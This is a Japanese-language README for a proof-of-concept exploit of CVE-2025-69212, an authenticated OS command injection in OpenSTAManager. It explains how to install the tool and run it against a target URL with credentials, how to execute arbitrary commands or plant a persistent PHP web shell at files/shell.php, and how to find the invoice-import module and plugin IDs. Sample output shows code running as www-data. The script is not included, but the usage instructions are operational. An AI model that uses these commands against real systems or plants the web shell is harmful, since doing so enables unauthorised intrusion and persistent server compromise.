
CVE-2025-69212 - OpenSTAManager OS コマンドインジェクション PoC
依存関係のインストール:
pip install -r requirements.txt
単一のコマンドを実行し、その出力を表示する:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
代わりに永続的なPHPウェブシェルを配置する:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
| フラグ | 説明 |
|---|---|
-u, --url | 対象インスタンスのベースURL |
-U, --username | 認証用のユーザー名 |
-P, --password | 認証用のパスワード |
-c, --command | 実行するコマンド、出力は pwn_out.txt に保存されます |
--shell | 単一のコマンドを実行する代わりに、files/shell.php にPHPウェブシェルを配置します |
--id-module | 請求書インポート機能のモジュールID(デフォルト: 14) |
--id-plugin | 請求書インポート機能のプラグインID(デフォルト: 48) |
id_module と id_plugin はインスタンスごとに異なります。デフォルトが機能しない場合は、ターゲットのWeb UIにログインし、電子請求書インポート機能に移動して、ブラウザのネットワークタブでリクエストパラメータを確認してください。
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------